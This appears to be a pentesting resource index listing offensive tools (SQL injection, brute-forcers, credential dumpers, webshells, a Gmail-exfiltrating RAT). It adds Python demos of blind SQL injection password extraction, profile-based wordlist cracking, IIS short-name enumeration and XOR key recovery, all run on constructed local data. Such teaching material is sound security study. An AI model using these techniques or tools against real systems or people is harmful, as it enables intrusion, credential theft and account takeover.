Pentesting Resource

1. Websites/Blogs/Forums

1.1. Multi-func sites

1.2. Blogs

1.3. Report Platform

1.4. Forums

1.5. Mailing Lists

2. Tools

2.1. Pentest environments

2.2. Encode/Decode

2.3. Crypto

2.4. Domain/IP

2.5. XSS

2.6. Database scanning and injection tools (SQLi)

  • sqlmap
    • The king of injection tools
  • NoSQLMap
  • SQLiScanner
    • A passive SQL injection scanner built on sqlmap and Charles
  • DSSS
    • A SQL injection vulnerability scanner in 99 lines of code
  • Feigong
    • MySQL injection script that adapts freely to all kinds of situations
  • NoSQLAttack
    • An attack tool aimed at MongoDB
  • bbqsql
    • Blind SQL injection exploitation framework
  • PowerUpSQL
    • PowerShell framework for attacking SQL Server
  • whitewidow
    • Yet another database scanner
  • mongoaudit
    • MongoDB auditing and pentesting tool
  • commix
    • Exploitation tool for command execution at injection points
    • Short for "command injection exploiter": a web-oriented command injection detection tool
  • sqli-hunter
    • Web proxy that loads the sqlmap API to detect SQLi in real time
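Most of the scanners above (DSSS, bbqsql, sqlmap's boolean-based mode) rest on one idea: send a TRUE and a FALSE condition through the injection point and compare the responses. The example below is added here and is not code from any of the listed tools; it builds a small constructed SQLite "application" with a deliberately vulnerable string-formatted query next to its parameterized fix, detects the injection with a boolean probe, and then extracts a secret one character at a time through the same true/false oracle.

```python
import sqlite3


def make_app():
    """Constructed in-memory SQLite 'application' with a products table and a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO products (name) VALUES (?)", [("apple",), ("pear",), ("plum",)])
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def search_vulnerable(conn, term):
    """Vulnerable: user input is concatenated into the SQL text, so a quote breaks out of the literal."""
    sql = f"SELECT name FROM products WHERE name = '{term}'"
    return len(conn.execute(sql).fetchall())


def search_safe(conn, term):
    """Hardened: a bound parameter is always data, never SQL syntax."""
    return len(conn.execute("SELECT name FROM products WHERE name = ?", (term,)).fetchall())


def is_boolean_injectable(search, base="apple"):
    """Boolean-based detection: a TRUE condition must leave the baseline response unchanged
    while a FALSE condition must change it. `search` maps a query string to a row count."""
    baseline = search(base)
    true_case = search(base + "' AND '1'='1")
    false_case = search(base + "' AND '1'='2")
    return baseline > 0 and true_case == baseline and false_case != true_case


def extract_blind(search, query, base="apple", max_len=32):
    """Recover the single-row result of `query` one character at a time through the
    true/false oracle, binary-searching the printable ASCII range for each position."""
    result = ""
    for pos in range(1, max_len + 1):
        # Stop once the position is past the end of the secret.
        if search(f"{base}' AND LENGTH(({query})) >= {pos} AND '1'='1") == 0:
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{base}' AND UNICODE(SUBSTR(({query}), {pos}, 1)) > {mid} AND '1'='1"
            if search(probe) > 0:
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def run_demo(fn, secret_query="SELECT password FROM users WHERE name = 'admin'"):
    """Run detection and extraction against one search implementation on a fresh database."""
    conn = make_app()
    search = lambda term: fn(conn, term)
    return is_boolean_injectable(search), extract_blind(search, secret_query)


if __name__ == "__main__":
    for name, fn in (("vulnerable", search_vulnerable), ("safe", search_safe)):
        injectable, secret = run_demo(fn)
        print(f"{name}: injectable={injectable} extracted={secret!r}")
```

Against the vulnerable search the probe reports injectable and the admin password comes back in about six binary-search rounds per character; against the parameterized search every probe returns zero rows, so the TRUE and FALSE cases are indistinguishable and extraction stops immediately.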

2.7. Weak-password and information-leak scanning

  • awBruter
    • Brute-forcer for one-line (一句话) webshell passwords, billed as a thousand times faster
  • Cr3dOv3r
    • Given an email address, searches for leaked passwords and can test whether the credentials log in on major websites
  • x-crack
    • Weak password scanner, Support: FTP/SSH/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB
  • htpwdScan
    • A simple HTTP brute-force and credential-stuffing script
  • BBScan
    • A mini batch scanner for information leaks
  • GitHack
    • Exploits exposed .git directories
  • BScanner
    • Small dictionary-based directory scanner
  • fenghuangscanner_v3
    • Port and weak-password detection for various services, by wilson9x1; the original address no longer works
  • F-Scrack
    • Weak-password detection script for a range of services
  • cupp
    • Generates weak-password dictionaries from the target user's habits
  • genpAss
    • Weak-password generator tailored to Chinese users' habits
  • crack_ssh
    • Goroutine-based SSH/Redis/MongoDB weak-password cracker written in Go
  • Sreg
    • Given an email, phone number or username, returns the online accounts ("internet passports") registered by that user
  • GitPrey
    • GitHub sensitive-information scanner
  • gitscan
    • GitHub information gathering; scans the most recently pushed commits in real time for email, account and password information
  • truffleHog
    • GitHub sensitive-information scanner, including commit history
  • GitHarvester
    • GitHub repository information gathering tool
  • gitleaks
    • Searches full repo history for secrets and keys
  • x-patrol
    • GitHub leak scanning system
  • pydictor
    • Brute-force dictionary builder
  • Blasting_dictionary
    • Password dictionaries
  • xxe-recursive-download
    • Recursive file download via XXE
  • xlog
    • Web log scanner
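cupp, genpAss and pydictor all build targeted wordlists from what is known about a person rather than from a generic dictionary. The example below is added here and is not any of those tools' code; it takes a constructed profile (the names, pet, company and birth date are invented), expands it with the casing, leet-speak, separator, date-fragment and suffix patterns people actually use, and then checks the list offline against an unsalted SHA-256 hash, which is how a recovered hash would be tested before reaching for hashcat.

```python
import hashlib

# Constructed target profile (the kind of OSINT cupp/genpAss ask for interactively).
PROFILE = {"first": "Wei", "last": "Zhang", "nick": "weizi", "pet": "Tommy",
           "company": "Acme", "birth": "1990-07-15"}

LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})
SEPARATORS = ["", "@", "_", "."]
SUFFIXES = ["", "1", "123", "!", "!@#", "888"]


def base_words(profile):
    """Name-like tokens in the casings people actually type, plus first/last combinations."""
    words = set()
    for key in ("first", "last", "nick", "pet", "company"):
        w = profile.get(key, "")
        if w:
            words.update({w.lower(), w.capitalize(), w.upper()})
    if profile.get("first") and profile.get("last"):
        first, last = profile["first"].lower(), profile["last"].lower()
        words.update({first + last, last + first, first[0] + last, first + last[0]})
    return sorted(words)


def date_tokens(birth):
    """Date fragments from an ISO date: '', YYYY, YY, MMDD, DDMM, YYYYMMDD."""
    y, m, d = birth.split("-")
    return ["", y, y[2:], m + d, d + m, y + m + d]


def generate(profile, min_len=6, max_len=20):
    """Cartesian product of word variants, separators, date fragments and suffixes,
    deduplicated with insertion order preserved so likelier guesses come first."""
    seen, out = set(), []
    for word in base_words(profile):
        for variant in (word, word.translate(LEET)):
            for token in date_tokens(profile["birth"]):
                # A separator only makes sense when something follows it.
                for sep in (SEPARATORS if token else [""]):
                    for suffix in SUFFIXES:
                        cand = variant + sep + token + suffix
                        if min_len <= len(cand) <= max_len and cand not in seen:
                            seen.add(cand)
                            out.append(cand)
    return out


def sha256_hex(s):
    return hashlib.sha256(s.encode()).hexdigest()


def crack_sha256(target_hex, candidates):
    """Offline check of a recovered unsalted SHA-256 hash against the generated list."""
    for cand in candidates:
        if sha256_hex(cand) == target_hex:
            return cand
    return None


if __name__ == "__main__":
    words = generate(PROFILE)
    print(len(words), "candidates, e.g.", words[:5])
    # Constructed example: the victim chose last name + '@' + birth year + '!'
    print("cracked:", crack_sha256(sha256_hex("Zhang@1990!"), words))
```

A few thousand candidates derived from one profile are enough to recover patterns such as "Zhang@1990!" in milliseconds; the same list fed to hashcat or a login brute-forcer is the usual next step.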

2.8. Port scanning, fingerprinting and middleware scanning

  • Nmap
    • The king of port scanners
    • https://svn.nmap.org/
  • anoNmap
    • anoNmap is a port scanner which utilizes Facebook's XSPA vulnerability to perform anonymous port scans
  • wyportmap
    • Target port scanning plus system/service fingerprinting
  • weakfilescan
    • Dynamic multi-threaded sensitive-file leak detection tool
  • getcms
    • A cms discover recognize tool in python
  • wafw00f
    • WAF product fingerprinting
  • wafid
    • Wafid identify and fingerprint Web Application Firewall (WAF) products.
  • sslscan
    • Identifies supported SSL/TLS versions and cipher suites
  • whatweb
    • Web fingerprinting
  • FingerPrint
    • Web application fingerprinting
  • Scan-T
    • Crawler-style fingerprinting
  • Nscan
    • a fast Network scanner inspired by Masscan and Zmap
  • F-NAScan
    • Network asset scanning: ICMP liveness probing, port scanning, port/service fingerprinting
  • F-MiddlewareScan
    • Middleware scanning
  • dirsearch
    • Web path scanner
  • bannerscan
    • Class C (/24) banner and path scanning
  • RASscan
    • Port and service scanning
  • bypass_waf
    • Automated WAF bypass brute-forcing
  • WAFNinja
    • Automated WAF bypass script
  • xcdn
    • Tries to find the real IP behind a CDN
  • BingC
    • Bing-search-based class C (/24) and neighbouring-site lookup; multi-threaded, API supported
  • DirBrute
    • Multi-threaded web directory brute-forcer
  • httpscan
    • A small crawler-style web host discovery tool for network ranges
  • doom
    • Distributed IP/port vulnerability scanner with task distribution built on thorn
  • grab.js
    • Fast TCP banner grabbing and parsing tool similar to zgrab, supporting more protocols
  • whichCDN
    • CDN identification and detection
  • bcrpscan
    • Crawler-based web path scanner
  • Breacher
    • An admin panel finder script written in python.

2.9. Internal-network penetration testing

  • VulScritp
    • Enterprise intranet penetration scripts: banner scanning, port scanning and exploits for various common vulnerabilities
  • PenTestScripts
  • network_backdoor_scanner
    • Intranet detection framework based on network traffic
  • WebRtcXSS
    • Automates XSS to attack the internal network
  • mimikatz
    • The essential Windows post-exploitation tool (credential extraction from memory)
  • PowerSploit
    • Collection of PowerShell post-exploitation modules
  • PowerShell
    • Collection of PowerShell tools
  • p0wnedShell
    • PowerShell Runspace Post Exploitation Toolkit
  • UACME
  • LOLBAS
  • hunter
    • Enumerates user logon information via the Windows API
  • LaZagne
    • Extracts the various passwords stored locally on the machine
  • mimipenguin
    • Linux credential dumper
  • johnny
    • Password cracker (GUI front-end for John the Ripper)
  • icebreaker
    • Automates attacks against Active Directory from inside the network
  • Powershell-RAT
    • Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.

2.10. Targeted vulnerability testing tools

  • PrivExchange
  • weblogic_unserialize_exploit
    • WebLogic Java deserialization exploit with command output echo
  • cmsPoc
    • phpcms v9.6.0 wap module SQL injection: retrieves passwd
    • icms v7.0.1 admincp.php SQL injection: arbitrary backend login
  • hackUtils
    • Penetration and web attack scripts
    • Java deserialization exploitation toolkit
  • ysoserial
    • Java deserialization exploitation tool
  • Jenkins
    • Jenkins vulnerability probing; user enumeration and brute-forcing
  • dzscan
    • Discuz! vulnerability scanner
  • CMS-Exploit-Framework
    • CMS attack framework
  • IIS_shortname_Scanner
    • IIS short filename (8.3 tilde) vulnerability scanner
  • FlashScanner
    • Flash XSS scanner
  • SSTIF
    • Semi-automated tool for server-side template injection (SSTI)
  • tplmap
    • SSTI detection and exploitation tool
  • dockerscan
    • Docker scanning tool
  • break-fast-serial
    • Detects Java deserialization vulnerabilities via out-of-band DNS resolution
  • dirtycow.github.io
    • Dirty COW (CVE-2016-5195) privilege escalation exploits
  • a2sv
    • Auto Scanning to SSL Vulnerability
  • msdat
    • MSDAT: Microsoft SQL Database Attacking Tool
  • xxegen
    • Online XXE payload generator
  • DSXS
    • Damn Small XSS Scanner (DSXS)
    • a fully functional Cross-site scripting vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.
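The IIS short filename scanner in the list works from a single bit of information: on affected IIS builds a request containing an 8.3 tilde wildcard (such as ADMIN*~1*) is answered with 404 when some file matches and 400 when none does, so the 8.3 names of files in the webroot can be enumerated one character at a time. The example below is added here and is not the scanner's own code; it simulates that oracle locally with a constructed webroot listing and a simplified 8.3 name generator (an assumption: every listed file is given a tilde name, and the counter is kept per basename/extension pair), then runs the depth-first enumeration against it.

```python
import fnmatch
import string

# Constructed webroot listing for the simulated server (not from any real target).
WEBROOT = ["admin_panel.aspx", "adminbackup.zip", "index.html", "web.config",
           "default.aspx", "Backup Scripts.rar", "backup-old.rar"]

# Characters tried at each position; the real scanner also tries a few more symbols.
CHARSET = string.ascii_uppercase + string.digits + "_-"


def short_name(long_name, counters):
    """Simplified 8.3 generation (assumption: every listed file gets a tilde name):
    drop spaces and extra dots, uppercase, keep 6 basename chars + '~N' and 3 extension chars."""
    base, dot, ext = long_name.rpartition(".")
    if not dot:
        base, ext = long_name, ""
    clean = lambda s: "".join(ch for ch in s.upper() if ch not in " .")
    base, ext = clean(base)[:6], clean(ext)[:3]
    counters[(base, ext)] = counters.get((base, ext), 0) + 1
    return f"{base}~{counters[(base, ext)]}" + (f".{ext}" if ext else "")


def make_oracle(long_names):
    """Simulates the vulnerable IIS behaviour: a tilde wildcard request such as
    'ADMIN*~1*' answers 404 when some short name matches and 400 when none does."""
    counters = {}
    shorts = [short_name(n, counters) for n in long_names]
    return lambda pattern: 404 if any(fnmatch.fnmatchcase(s, pattern) for s in shorts) else 400


def enumerate_extension(oracle, name):
    """Extend the extension one character at a time once the basename is known."""
    ext = ""
    while len(ext) < 3:
        for ch in CHARSET:
            if oracle(f"{name}.{ext}{ch}*") == 404:
                ext += ch
                break
        else:
            break
    return f".{ext}" if ext else ""


def enumerate_short_names(oracle, max_tilde=2):
    """Depth-first enumeration of 8.3 basenames, then extensions, using only the 404/400 oracle."""
    found, stack = [], [""]
    while stack:
        prefix = stack.pop()
        for ch in CHARSET:
            cand = prefix + ch
            # Does any short name start with this prefix, for any tilde counter we care about?
            if not any(oracle(f"{cand}*~{n}*") == 404 for n in range(1, max_tilde + 1)):
                continue
            # Is the basename exactly this prefix? Then resolve its extension.
            for n in range(1, max_tilde + 1):
                if oracle(f"{cand}~{n}*") == 404:
                    found.append(f"{cand}~{n}" + enumerate_extension(oracle, f"{cand}~{n}"))
            if len(cand) < 6:
                stack.append(cand)
    return sorted(found)


if __name__ == "__main__":
    oracle = make_oracle(WEBROOT)
    for name in enumerate_short_names(oracle):
        print(name)
```

The recovered names (ADMIN_~1.ASP, BACKUP~1.RAR, BACKUP~2.RAR and so on) are not directly downloadable, but they reveal the first six characters of file names that a directory brute-forcer would otherwise never guess; against a real server the oracle is an HTTP request per pattern, so the enumeration costs a few hundred requests per webroot.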

2.11. Static code scanning and runtime call-stack tracing

2.12. Fuzzing

2.13. Exploitation and attack frameworks

2.14. Modular and all-in-one scanners

  • nmap-vulners
    • NSE script using some well-known service to provide info on vulnerabilities
    • Extends Nmap with vulnerability lookups
  • vulners-scanner
  • shodan
  • spiderfoot
  • RED_HAWK
    • All in one tool for Information Gathering, Vulnerability Scanning and Crawling.
  • V3n0M-Scanner
    • Popular Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
  • BlackWidow
    • Python web crawler that gathers intelligence on a target site and fuzzes for OWASP vulnerabilities
  • w8scan
    • A vulnerability scanner modelled on bugscan
  • whitewidow
    • SQL Vulnerability Scanner
  • CMSmap
  • AngelSword
    • CMS vulnerability detection framework written in Python 3
  • Luna
    • Open-source automated web vulnerability scanner
  • Zeus-Scanner
  • S7scan
  • Striker
  • xunfeng
    • Xunfeng (巡风) is a rapid vulnerability response and patrol scanning system for enterprise intranets
  • ZeroExploit
    • Combined front-end and back-end detection
  • ark
    • Distributed scanning framework
  • ReconDog
  • http://www.arachni-scanner.com
  • AZScanner
    • Automated vulnerability scanner: subdomain brute-forcing, port scanning, directory brute-forcing, detection of common framework vulnerabilities
  • lalascan
    • Distributed web vulnerability scanning framework combining OWASP Top 10 scanning with perimeter asset discovery
  • BkScanner
    • Distributed, plugin-based web vulnerability scanner
  • GourdScanV2
    • Passive vulnerability scanning
  • pentestdb
    • Web penetration testing database
  • passive_scan
    • HTTP-proxy-based web vulnerability scanner
  • Sn1per
    • Automated scanner, including middleware scanning and device fingerprinting
  • pentestEr_Fully-automatic-scanner
    • Targeted fully automated penetration testing tool
  • 3xp10it
    • Automated penetration testing framework
  • lcyscan
    • Scanning effectiveness unverified
  • POC-T
    • Plugin-based concurrent framework for penetration testing
  • leakScan
    • Web-based online vulnerability scanning
  • AnyScan
    • Under development...
  • Hscan-Win-Gui
  • DorkNet
    • Selenium powered Python script to automate searching for vulnerable web apps.
  • AutoSploit
    • Automated Mass Exploiter
  • w9scan
    • An all-round website vulnerability scanner that borrows from the excellent code of many predecessors. With 1200+ built-in plugins it performs a large-scale check of a site; features include, but are not limited to, web fingerprinting, port fingerprinting, site structure analysis, detection of assorted popular vulnerabilities, crawling, SQL injection detection and XSS detection. w9scan automatically produces a polished HTML report.
  • Scanners-Box
    • The toolbox of open source scanners: a collection of open-source scanners written by security practitioners
  • HUNT
    • Identify common parameters vulnerable to certain vulnerability classes

2.15. Shell

  • webshell
  • Cknife
  • AntSword (中国蚁剑)
  • PyShell
    • Python backdoor
  • PyCmd
    • Python, PHP and JSP one-line (一句话) webshells
    • Details: thief.one
  • hackUtils
    • Penetration and web attack scripts
  • phpsploit
    • PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
  • hack_tools_for_me
    • A large collection of small web penetration tools
  • p0wnedShell
    • Runs PowerShell script code without depending on powershell.exe

2.16. Wireless / Wi-Fi / IoT

2.17. Enterprise network self-assessment

  • LNScan
    • Detailed internal network information scanner
  • LocalNetworkScanner
    • Local network scanner implemented in JavaScript
  • xunfeng
    • Network asset identification engine and vulnerability detection engine
  • theHarvester
    • Monitors sensitive enterprise assets indexed by search engines: employee email addresses, subdomains, hosts
  • Multisearch-v2
    • Aggregated search across search engines, usable for discovering sensitive enterprise assets that search engines have indexed

2.18. Exploit development frameworks and tools

  • rop-tool
    • Binary exploit development tool
  • pwntools
    • Framework for writing CTF pwn exploit scripts
  • zio
    • an easy-to-use io library for pwning development
  • frida
    • Cross-platform injection tool
    • Inject JavaScript to explore native apps on Windows, Mac, Linux, iOS and Android
  • Sickle
    • Shellcode development tool
  • radare2
    • unix-like reverse engineering framework and commandline tools
  • CHAOS
    • CHAOS allow generate payloads and control remote Windows systems.

2.19. MITM & phishing

2.20. Defense

2.21. Mining

2.22. Miscellaneous

2.23. CTF tools

  • Miscellaneous
  • Attacks
    • Bettercap - Framework to perform MITM (Man in the Middle) attacks.
    • Layer 2 attacks - Attack various protocols on layer 2
  • Crypto
    • FeatherDuster - An automated, modular cryptanalysis tool
    • PkCrack - A tool for Breaking PkZip-encryption
    • RSATool - Generate private key with knowledge of p and q
    • XORTool - A tool to analyze multi-byte xor cipher
  • Bruteforcers
    • Hashcat - Password Cracker
    • John The Jumbo - Community enhanced version of John the Ripper
    • John The Ripper - Password Cracker
    • Nozzlr - Nozzlr is a bruteforce framework, truly modular and script-friendly.
    • Ophcrack - Windows password cracker based on rainbow tables.
    • Patator - Patator is a multi-purpose brute-forcer, with a modular design.
  • Exploits
    • DLLInjector - Inject dlls in processes
    • libformatstr - Simplify format string exploitation.
    • Metasploit - Penetration testing software
    • one_gadget - A tool to find the one gadget execve('/bin/sh', NULL, NULL) call
      • gem install one_gadget
    • Pwntools - CTF Framework for writing exploits
    • Qira - QEMU Interactive Runtime Analyser
    • ROP Gadget - Framework for ROP exploitation
    • V0lt - Security CTF Toolkit
  • Forensics
  • Networking
    • Masscan - Mass IP port scanner, TCP port scanner
    • Nipe - Nipe is a script to make Tor Network your default gateway.
    • Nmap - open source utility for network discovery and security auditing
    • Wireshark - Analyze the network dumps
      • apt-get install wireshark
    • Zmap - an open-source network scanner
  • Reversing
    • Androguard - Reverse engineer Android applications
    • Angr - platform-agnostic binary analysis framework
    • Apk2Gold - Yet another Android decompiler
    • ApkTool - Android Decompiler
    • Barf - Binary Analysis and Reverse engineering Framework
    • Binary Ninja - Binary analysis framework
    • BinUtils - Collection of binary tools
    • BinWalk - Analyze, reverse engineer, and extract firmware images.
    • Boomerang - Decompile x86 binaries to C
    • ctf_import - run basic functions from stripped binaries cross platform
    • GDB - The GNU project debugger
    • GEF - GDB plugin
    • Hopper - Reverse engineering tool (disassembler) for OSX and Linux
    • IDA Pro - Most used Reversing software
    • Jadx - Decompile Android files
    • Java Decompilers - An online decompiler for Java and Android APKs
    • Krakatau - Java decompiler and disassembler
    • PEDA - GDB plugin (only python2.7)
    • Plasma - An interactive disassembler for x86/ARM/MIPS which can generate indented pseudo-code with colored syntax.
    • Pwndbg - A GDB plugin that provides a suite of utilities to hack around GDB easily.
    • radare2 - A portable reversing framework
    • Uncompyle - Decompile Python 2.7 binaries (.pyc)
    • WinDbg - Windows debugger distributed by Microsoft
    • Z3 - a theorem prover from Microsoft Research
    • Detox - A Javascript malware analysis tool
    • Revelo - Analyze obfuscated Javascript code
    • RABCDAsm - Collection of utilities including an ActionScript 3 assembler/disassembler.
    • Swftools - Collection of utilities to work with SWF files
    • Xxxswf - A Python script for analyzing Flash files.
  • Services
    • CSWSH - Cross-Site WebSocket Hijacking Tester
    • Request Bin - Lets you inspect http requests to a particular url
  • Steganography
    • Convert - Convert images b/w formats and apply filters
    • Exif - Shows EXIF information in JPEG files
    • Exiftool - Read and write meta information in files
    • Exiv2 - Image metadata manipulation tool
    • ImageMagick - Tool for manipulating images
    • Outguess - Universal steganographic tool
    • Pngtools - For various analysis related to PNGs
      • apt-get install pngtools
    • SmartDeblur - Used to deblur and fix defocused images
    • Steganabara - Tool for stegano analysis written in Java
    • Stegbreak - Launches brute-force dictionary attacks on JPG image
    • Steghide - Hide data in various kind of images
    • Stegsolve - Apply various steganography techniques to images
  • Web
    • Commix - Automated All-in-One OS Command Injection and Exploitation Tool.
    • Hackbar - Firefox addon for easy web exploitation
    • OWASP ZAP - Intercepting proxy to replay, debug, and fuzz HTTP requests and responses
    • Postman - Add on for chrome for debugging network requests
    • SQLMap - Automatic SQL injection and database takeover tool
    • W3af - Web Application Attack and Audit Framework.
    • XSSer - Automated XSS tester
    • WhatWaf
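XORTool, listed under Crypto above, automates the classic attack on a repeating-key XOR cipher: guess the key length, then break each column as a single-byte XOR by scoring the candidate plaintext against English letter frequencies. The example below is added here and is not XORTool's code; the English sample text and the five-byte key are constructed, and the key-length choice uses the overall English score of the best key per length (taking the shortest length within 5% of the best, since multiples of the true length score about the same) rather than XORTool's own heuristics.

```python
# Constructed English sample (not from the page); long enough for per-column letter statistics.
PLAINTEXT = (
    b"Repeating key XOR is the simplest stream cipher and also the easiest to break. "
    b"Each byte of the message is combined with one byte of a short key that is reused "
    b"over and over, so every byte encrypted with the same key position is really just "
    b"a Caesar style substitution. An attacker first guesses the key length, then treats "
    b"each column as a separate single byte XOR problem and picks the key byte whose "
    b"output looks most like English text. Spaces and the letters e, t, a, o, i and n "
    b"dominate ordinary prose, which is exactly the statistical signal that gives the "
    b"key away. The same weakness appears whenever a one time pad is reused, in home "
    b"grown obfuscation of configuration files and malware strings, and in challenge "
    b"binaries that hide a flag behind a fixed byte mask."
)
KEY = b"\x1f\x9aK3!"  # constructed 5-byte key; a high byte makes wrong guesses unprintable

# Approximate English letter frequencies; space gets its own weight.
FREQ = {"a": .082, "b": .015, "c": .028, "d": .043, "e": .127, "f": .022, "g": .020, "h": .061,
        "i": .070, "j": .002, "k": .008, "l": .040, "m": .024, "n": .067, "o": .075, "p": .019,
        "q": .001, "r": .060, "s": .063, "t": .091, "u": .028, "v": .010, "w": .024, "x": .002,
        "y": .020, "z": .001, " ": .130}


def _byte_score(b):
    """Likelihood-style score for one decrypted byte: letters by frequency, uppercase at half
    weight, other printable ASCII neutral, control and non-ASCII bytes heavily penalised."""
    if b >= 127 or (b < 32 and b not in (9, 10, 13)):
        return -5.0
    c = chr(b)
    if c.isupper():
        return 0.5 * FREQ[c.lower()]
    return FREQ.get(c, 0.0)


SCORE = [_byte_score(b) for b in range(256)]  # lookup table keeps the inner loop cheap


def xor_repeating(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def break_single_byte_xor(column):
    """Return the key byte under which the column scores most like English."""
    return max(range(256), key=lambda k: sum(SCORE[b ^ k] for b in column))


def key_for_length(ct, length):
    """Best key of a given length and the mean per-byte English score of the result."""
    key = bytes(break_single_byte_xor(ct[i::length]) for i in range(length))
    score = sum(SCORE[b] for b in xor_repeating(ct, key)) / len(ct)
    return key, score


def recover_key(ct, max_len=12):
    """Try every key length up to max_len and keep the shortest one whose score is within
    5% of the best (multiples of the true length score about the same, so shortest wins)."""
    trials = {L: key_for_length(ct, L) for L in range(1, max_len + 1)}
    best = max(score for _, score in trials.values())
    length = min(L for L, (_, score) in trials.items() if score >= best - 0.05 * abs(best))
    return trials[length][0]


if __name__ == "__main__":
    ct = xor_repeating(PLAINTEXT, KEY)
    key = recover_key(ct)
    print("recovered key:", key, "correct:", key == KEY)
    print(xor_repeating(ct, key)[:60].decode())
```

Roughly 150 bytes per key column is plenty for frequency scoring to pin down each byte; the attack degrades only when the key approaches the message length (at which point it is a one-time pad) or when the plaintext is not text at all, where a known-plaintext fragment such as a file header replaces the frequency table.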

3. Learning

3.1. Web application pentesting

3.2. Binary and memory exploitation

3.3. Windows and Linux Privilege Escalation

3.4. Miscellaneous

4. Wargames/CTFs/VulEnvApp

5. WriteUps

6. Miscellaneous

Copyright © ChrisLinn 2017-2018, all rights reserved. Powered by Gitbook. File last revised: 2020-03-31 01:22:04
